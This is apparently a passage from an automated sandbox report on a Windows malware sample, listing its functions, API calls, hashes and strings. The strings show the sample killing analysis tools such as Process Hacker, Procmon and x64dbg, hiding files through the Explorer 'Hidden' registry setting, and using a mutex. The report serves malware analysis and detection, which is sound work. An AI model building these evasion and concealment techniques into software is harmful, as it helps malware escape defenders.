                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03710B3650CAC196E770AB15F44436AF3A0FB84784F904139D69D82BD8DF7CD489CB92
                                                                                                                                                                                                                                  Function 00007FF7F73E3DEC Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                                                  • Opcode ID: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction ID: 0477c6a3204eb393a7bfc2dcd04902eb54eb32747ec7634cf9dfbe258e1e8090
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F121CD39A0C9C692E770AB11E8483AAB361FFC4B54F905238C6AD435E8DF3DD45ACB51
                                                                                                                                                                                                                                  Function 00007FF7F73E33A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                  • Opcode ID: aa528dc0d34b26b21f7a8f6dc84e5bcfd0c47c2085a05aefa333fbb111b19ad5
                                                                                                                                                                                                                                  • Instruction ID: e40d11e99fae05bd1f1f896ea79f6f749af6bbaf01b33b24ac65dd0c090a4feb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa528dc0d34b26b21f7a8f6dc84e5bcfd0c47c2085a05aefa333fbb111b19ad5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F0A435A0C181D3EB759612E8043B5A6D0AF49348F80013DD26D425D4DE3ED54ECF97
                                                                                                                                                                                                                                  Function 00007FF7F73E1444 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                                                                                                  • Opcode ID: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                                  • Instruction ID: 42cf1601abca1d0b50917e05495adb705349e0850da526afd2e5c02f8f125e0e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53E03066A1C09293E7605724F504339A2F1FB54B44F800535EAADC27D4FE2CDA458B91
                                                                                                                                                                                                                                  Function 00007FF7F73E452C Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                                                                                  • Opcode ID: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction ID: 60bbfb092ea4251cef042426b3e344a81685086d8fc860611e4f15af7ff10667
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C814F36A08B8182EB10DB55F44436AF7A0FBC9B90F514139EA9D93BA8DF3CD059CB50
                                                                                                                                                                                                                                  Function 00007FF7F73E3074 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E440C: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E30AF), ref: 00007FF7F73E4454
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E440C: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E30AF), ref: 00007FF7F73E4491
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E440C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E30AF), ref: 00007FF7F73E449C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3B4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E30B4), ref: 00007FF7F73E3B8F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3B4C: RegSetValueExW.ADVAPI32 ref: 00007FF7F73E3BC5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3B4C: RegCloseKey.ADVAPI32 ref: 00007FF7F73E3BD4
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3BEC: RegDeleteKeyW.ADVAPI32 ref: 00007FF7F73E3C04
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7F73E3DFF
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: Process32FirstW.KERNEL32 ref: 00007FF7F73E3E32
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: CloseHandle.KERNEL32 ref: 00007FF7F73E3E44
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: wcscmp.MSVCRT ref: 00007FF7F73E3E59
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: OpenProcess.KERNEL32 ref: 00007FF7F73E3E6F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: TerminateProcess.KERNEL32 ref: 00007FF7F73E3E92
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: CloseHandle.KERNEL32 ref: 00007FF7F73E3EA0
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: Process32NextW.KERNEL32 ref: 00007FF7F73E3EB3
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E3DEC: CloseHandle.KERNEL32 ref: 00007FF7F73E3EC5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E397C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7F73E3AD4), ref: 00007FF7F73E39AC
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF7F73E315E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                                                                                  • Opcode ID: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction ID: e2eb142cb79ef975973a1d4944ec3a9d2571d78a5872476a873918ef2282a55d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C219529E19592B3EB00B725E8912F9A665AF90310FC0113DE43D461E2DE6EF51F87E3
                                                                                                                                                                                                                                  Function 00007FF7F73E2E04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                                                  • Opcode ID: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction ID: 000037023abcdb9ac964aeb8f42409105bc928f0b59398959b8dc157b68dca89
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35012D3AD0CA82D3E720AB11E844279B760FFC8B94F840139D95E426B4CE3DD59A8692
                                                                                                                                                                                                                                  Function 00007FF7F73E2EA4 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                                                  • Opcode ID: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction ID: 8e708635ce1cc9e3dc271e4361a77f7e77fa54a10598bb972895ca2921a691eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301DE3AD1CAC1D3E720AB11E85426DA370FFC8B45F801539E99E436A4CF3DD55A8652
                                                                                                                                                                                                                                  Function 00007FF7F73E3CAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                  • Opcode ID: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction ID: 88ab73602ede376a9d4975f313a3c62e6cdb87d684824bc575ffd81f130c30c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17311C3660CAC496D770EB15E4883AAB3B0FB88740F400239DA9D83BA8DF3CD555CB51
                                                                                                                                                                                                                                  Function 00007FF7F73E3B4C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                                                                                  • Opcode ID: 56df753b757407a9f28e07383f4625f46d64df334b1c9f81eb86b6fd020a95cd
                                                                                                                                                                                                                                  • Instruction ID: 641bf409f2b394cb2a8c383c4b18c5dab937e23f3dfe033089ebade4e0861fc8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56df753b757407a9f28e07383f4625f46d64df334b1c9f81eb86b6fd020a95cd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8012D3A618A809BD7509B14F84475AB770FB88794F801225EB9D43BA8DF7CC159CF41
                                                                                                                                                                                                                                  Function 00007FF7F73E13C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                                  • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction ID: a6bb5a3fcffb20feee40ee3577be5a1805c3b9ac626e9d1a3431de7d3ae4c15f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9301C86690869697E720AB10F454329A7A0FF84348FD04139E69E42694EF7CE64ECF52
                                                                                                                                                                                                                                  Function 00007FF7F73E3FCC Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                                                  • Opcode ID: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction ID: ee508c02091d204be4fd2b6aba35378da3323ac192946499e9edbabc0da098ec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C111F39A0C6C692E770AB10E44836AE3A0FFC4754F804238D6AD43AD8DF3DD819CB52
                                                                                                                                                                                                                                  Function 00007FF7F73E1088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                                  • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction ID: 16e550d88f17b9616d48c42d6915cb61972eb84e5cea194416c88601f53e4267
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E0ED29918AC2E3D720EB10F854329A3A0FF84744FD00538E99D426A4DF3CD95ECB52
                                                                                                                                                                                                                                  Function 00007FF7F73E2F34 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38FD
